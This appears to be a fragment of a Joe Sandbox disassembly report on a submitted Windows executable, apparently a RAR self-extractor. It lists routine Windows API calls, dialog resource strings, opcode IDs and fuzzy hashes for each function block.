                                                                                                                    • Instruction ID: 7b08f7695a550ca7ea76390fdbda8a7dc456b770dc05640adb321188f20ce20b
                                                                                                                    • Opcode Fuzzy Hash: 39974deed2ae4ae433f4e11da39fd4b56c55224f6c3c1ed81d8607d7ef58888d
                                                                                                                    • Instruction Fuzzy Hash: 82012833345210BBD6215F669D49F6777DDEB9AB41F010465F305B70D0CAA29A048776
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BA7E24,00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002), ref: 00BA7E93
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BA7EA6
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00BA7E24,00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002), ref: 00BA7EC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: 0d338f07fa3c844e69953a8d12b3c37371365ab000fc395b8195fa08d9b6da79
                                                                                                                    • Instruction ID: c007922c904df71c383d9f6deb4c87bebb698e2f8a573535cf5bcd58071676e1
                                                                                                                    • Opcode Fuzzy Hash: 0d338f07fa3c844e69953a8d12b3c37371365ab000fc395b8195fa08d9b6da79
                                                                                                                    • Instruction Fuzzy Hash: 53F04431944208BBCB159FA4DC09BAEBFF8EF44715F0041E9F805A3260DFB49E40CA90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                      • Part of subcall function 00B9081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8F2E4
                                                                                                                    • GetProcAddress.KERNEL32(00BC81C8,CryptUnprotectMemory), ref: 00B8F2F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                    • Opcode ID: 6ffa2ae65003ce6b7ad818df2f44d2a86bf9830461c933c880dc2a65b6ef4c76
                                                                                                                    • Instruction ID: d914c0e322756752b6c40bb89dbf2f3433d91ff2b326b55888ac0d258693a046
                                                                                                                    • Opcode Fuzzy Hash: 6ffa2ae65003ce6b7ad818df2f44d2a86bf9830461c933c880dc2a65b6ef4c76
                                                                                                                    • Instruction Fuzzy Hash: A5E04F709507029FCB21AF389C49B65BAD8AF04B00B2489ADF0DAA3660DAF4D540CB50
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2252061734-0
                                                                                                                    • Opcode ID: 3f55f729dd72872f375007efcb84163f04e53d22067fc0d3472f3cf054acf3ec
                                                                                                                    • Instruction ID: 4b0c72d6e70c487e73482a00477a78f2665f6ba2b5d6035624a9304bdef62064
                                                                                                                    • Opcode Fuzzy Hash: 3f55f729dd72872f375007efcb84163f04e53d22067fc0d3472f3cf054acf3ec
                                                                                                                    • Instruction Fuzzy Hash: 8251F571508212AFDB299F18D885BBA77E4FF56710F2441AEEC42475A2E731ED40D790
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00BABF39
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BABF5C
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BABF82
                                                                                                                    • _free.LIBCMT ref: 00BABF95
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BABFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: d28ddbb62a1ac33df54237f4c8dfb7284e977293d81a016dc107187c5426ed34
                                                                                                                    • Instruction ID: 21c1f5a2efc33054a254ff5448631d296ba5824e2f4e0edeec2891e28eecd312
                                                                                                                    • Opcode Fuzzy Hash: d28ddbb62a1ac33df54237f4c8dfb7284e977293d81a016dc107187c5426ed34
                                                                                                                    • Instruction Fuzzy Hash: 7101A7726096157F2321167B5C9DC7F6AEDDEC3FA131802A9F914D3142EF61CD0195B0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00BC1030,00000200,00BA91AD,00BA617E,?,?,?,?,00B8D984,?,?,?,00000004,00B8D710,?), ref: 00BA986E
                                                                                                                    • _free.LIBCMT ref: 00BA98A3
                                                                                                                    • _free.LIBCMT ref: 00BA98CA
                                                                                                                    • SetLastError.KERNEL32(00000000,00BB3A34,00000050,00BC1030), ref: 00BA98D7
                                                                                                                    • SetLastError.KERNEL32(00000000,00BB3A34,00000050,00BC1030), ref: 00BA98E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: be4bafdfe748c20f903e7de7d1c649c8392e25db09013c0d2964085b81dc2b15
                                                                                                                    • Instruction ID: 241791a888b3fb23d60f3c77d30ef3ae4e5420ca57792561f53439500db2f473
                                                                                                                    • Opcode Fuzzy Hash: be4bafdfe748c20f903e7de7d1c649c8392e25db09013c0d2964085b81dc2b15
                                                                                                                    • Instruction Fuzzy Hash: FD01F43614C6056BC31237356C99A1B26E9DFD3BF073102B8F515A31A2EF78CC016171
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B911CF: ResetEvent.KERNEL32(?), ref: 00B911E1
                                                                                                                      • Part of subcall function 00B911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B911F5
                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B90F21
                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00B90F3B
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00B90F54
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B90F60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B90F6C
                                                                                                                      • Part of subcall function 00B90FE4: WaitForSingleObject.KERNEL32(?,000000FF,00B91206,?), ref: 00B90FEA
                                                                                                                      • Part of subcall function 00B90FE4: GetLastError.KERNEL32(?), ref: 00B90FF6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1868215902-0
                                                                                                                    • Opcode ID: 8de556214d8c5d19e560d45a6b8b228db14122d3df03325d3cb4b2a089e646f7
                                                                                                                    • Instruction ID: ed62ce51b1078c168f35c1009fb603aa61a1ba5cf681eedb6b0fdbe516edd25b
                                                                                                                    • Opcode Fuzzy Hash: 8de556214d8c5d19e560d45a6b8b228db14122d3df03325d3cb4b2a089e646f7
                                                                                                                    • Instruction Fuzzy Hash: E7015271504B44EFCB22AB64DC85BC6BBE9FF08B10F400969F16B92160CBB57A44CA50
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BAC817
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BAC829
                                                                                                                    • _free.LIBCMT ref: 00BAC83B
                                                                                                                    • _free.LIBCMT ref: 00BAC84D
                                                                                                                    • _free.LIBCMT ref: 00BAC85F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 5701d3c1c6de54d98ca2c1729551c4bc0d6fe4bdcb20e417f5461543cd00bdc7
                                                                                                                    • Instruction ID: 91f1d51770f1e8e76d55386d28b976082d799de431eee30b16a2cf679396b044
                                                                                                                    • Opcode Fuzzy Hash: 5701d3c1c6de54d98ca2c1729551c4bc0d6fe4bdcb20e417f5461543cd00bdc7
                                                                                                                    • Instruction Fuzzy Hash: 0FF01272508200AB8660DB78E585C6677E9FB02714B5458ADF159D7962CFB4FC80CA64
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B91FE5
                                                                                                                    • _wcslen.LIBCMT ref: 00B91FF6
                                                                                                                    • _wcslen.LIBCMT ref: 00B92006
                                                                                                                    • _wcslen.LIBCMT ref: 00B92014
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B8B371,?,?,00000000,?,?,?), ref: 00B9202F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397213944-0
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BA891E
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BA8930
                                                                                                                    • _free.LIBCMT ref: 00BA8943
                                                                                                                    • _free.LIBCMT ref: 00BA8954
                                                                                                                    • _free.LIBCMT ref: 00BA8965
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _swprintf
                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\eP6sjvTqJa.exe,00000104), ref: 00BA7FAE
                                                                                                                    • _free.LIBCMT ref: 00BA8079
                                                                                                                    • _free.LIBCMT ref: 00BA8083
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                    • API String ID: 2506810119-917788599
                                                                                                                    APIs
                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BA31FB
                                                                                                                    • _abort.LIBCMT ref: 00BA3306
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                    • String ID: MOC$RCC
                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B87406
                                                                                                                      • Part of subcall function 00B83BBA: __EH_prolog.LIBCMT ref: 00B83BBF
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B874CD
                                                                                                                      • Part of subcall function 00B87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87AAB
                                                                                                                      • Part of subcall function 00B87A9C: GetLastError.KERNEL32 ref: 00B87AF1
                                                                                                                      • Part of subcall function 00B87A9C: CloseHandle.KERNEL32(?), ref: 00B87B00
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9AD98
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B9ADAD
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9ADC2
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                    APIs
                                                                                                                    • __fprintf_l.LIBCMT ref: 00B8D954
                                                                                                                    • _strncpy.LIBCMT ref: 00B8D99A
                                                                                                                      • Part of subcall function 00B91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BC1030,00000200,00B8D928,00000000,?,00000050,00BC1030), ref: 00B91DC4
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    • Opcode ID: faf1ca4ab85dfeeb8e89193046a91ba829fbd656e26374f6cd9c50049246bc2e
                                                                                                                    • Instruction ID: 5d490370b26e0cf8218db24000813ce63f039b27754f3a59d02fca0f05bcced2
                                                                                                                    • Opcode Fuzzy Hash: faf1ca4ab85dfeeb8e89193046a91ba829fbd656e26374f6cd9c50049246bc2e
                                                                                                                    • Instruction Fuzzy Hash: 3D215C72440248AADF21EEA8CC46FEE7BE8EF05704F1405A2F910961F2E272DA48DB51
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B8AC5A,00000008,?,00000000,?,00B8D22D,?,00000000), ref: 00B90E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B8AC5A,00000008,?,00000000,?,00B8D22D,?,00000000), ref: 00B90E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B8AC5A,00000008,?,00000000,?,00B8D22D,?,00000000), ref: 00B90E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00B90EB7
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    • Opcode ID: 66a070c20be8a0de362cb70e6fe3d012c98c18f4d019ea5954d3608d1086e84d
                                                                                                                    • Instruction ID: df19b9e983495758ff84ab1987b18b8abf513270e90314d77075a8462381d2f6
                                                                                                                    • Opcode Fuzzy Hash: 66a070c20be8a0de362cb70e6fe3d012c98c18f4d019ea5954d3608d1086e84d
                                                                                                                    • Instruction Fuzzy Hash: DF1191B1A04B089FC3216F7ADC84AA7FBECEB55744F544C6EF1DAC3200DAB159408B64
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B9B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B9B304
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1
                                                                                                                    • API String ID: 445417207-3292211884
                                                                                                                    • Opcode ID: 747000e0e9b59e489ad627205ae055160a5d7c06328154b50e89a3d3f8fc989d
                                                                                                                    • Instruction ID: 73b7d2b86c74edecd2cf97a9821de44ff9a3495cff3f6ebf612eb307f07fc409
                                                                                                                    • Opcode Fuzzy Hash: 747000e0e9b59e489ad627205ae055160a5d7c06328154b50e89a3d3f8fc989d
                                                                                                                    • Instruction Fuzzy Hash: 8B11E53290012976DF22AB74AE89FFE3BECEB1A700F0000B5FA45B7190C7A49A018761
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    • Opcode ID: 4bfbbda9aeb3986e5b2a6641756f707ba6277308d20395b28376a3d8e331d83f
                                                                                                                    • Instruction ID: b230908627cd4f30090f240246890aa10a24960e178b30cd287ca3ef86ecaa1f
                                                                                                                    • Opcode Fuzzy Hash: 4bfbbda9aeb3986e5b2a6641756f707ba6277308d20395b28376a3d8e331d83f
                                                                                                                    • Instruction Fuzzy Hash: 78017176604245AFDF159F5AFC84EA67BE8FB0D394B040476F905D7231DE319850DBA0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                    • Instruction ID: ddaeb9da94a74aa7169a5d85d49171851eb498c8f64ac2287f3cf0a08ebfb495
                                                                                                                    • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                    • Instruction Fuzzy Hash: EEA17C729087869FEB25CF28C8917BEBBE5EF57320F2441EEE4959B281D2388D41D750
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B87F69,?,?,?), ref: 00B8A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00B87F69,?), ref: 00B8A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00B87F69,?,?,?,?,?,?,?), ref: 00B8A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00B87F69,?,?,?,?,?,?,?,?,?,?), ref: 00B8A4C6
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    • Opcode ID: eed7b195d04e6ac9519c41fcb3552d615203c7c5c812e60dfd3257359368d41f
                                                                                                                    • Instruction ID: 61c9e9e996e65cea74d58d074951beeb73a042d74f35b2ef0bf7f2bf5377a7ac
                                                                                                                    • Opcode Fuzzy Hash: eed7b195d04e6ac9519c41fcb3552d615203c7c5c812e60dfd3257359368d41f
                                                                                                                    • Instruction Fuzzy Hash: 0D419231188381ABEB31EF24DC45F9EBBE49F85700F08099EB5D1932A1D6A49A48DB53
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 176396367-0
                                                                                                                    • Opcode ID: 73babdcbe430b6dda6401778cf54c1ce2191ca42cc39bf6e12b8cda9c0f380e0
                                                                                                                    • Instruction ID: 0f226ed53f02d01b70bb67120a73b702480d9beee34f81afde9ed45a5134c303
                                                                                                                    • Opcode Fuzzy Hash: 73babdcbe430b6dda6401778cf54c1ce2191ca42cc39bf6e12b8cda9c0f380e0
                                                                                                                    • Instruction Fuzzy Hash: 7941B4719016699BCB21AF688C49AEE7BFCEF01711F00046AFD45F7251DF30AE558BA4
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BA91E0,?,00000000,?,00000001,?,?,00000001,00BA91E0,?), ref: 00BAC9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BACA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BA6CBE,?), ref: 00BACA70
                                                                                                                    • __freea.LIBCMT ref: 00BACA79
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: 37f84e592b707ef617a448098be9784616c6c4b1d41d1722770686c11f7d3a49
                                                                                                                    • Instruction ID: 848443e0c517c2a0face329291f697c5809c2121f8328017e748c2fa16f2bb5b
                                                                                                                    • Opcode Fuzzy Hash: 37f84e592b707ef617a448098be9784616c6c4b1d41d1722770686c11f7d3a49
                                                                                                                    • Instruction Fuzzy Hash: 1F318E72A0021AABDF25DF64DC85DBE7BE5EB42710B1442A8FC14E7254EB35DD50CBA0
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 00B9A666
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B9A675
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B9A683
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00B9A691
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 1df1f539e3d9d9e46067f96a0cdb35c81ce0faa6842e737c46247bf727813325
                                                                                                                    • Instruction ID: d08e10e632af87dd8d00a65859a3a8fef0d93800276f43518da8d14b54604da6
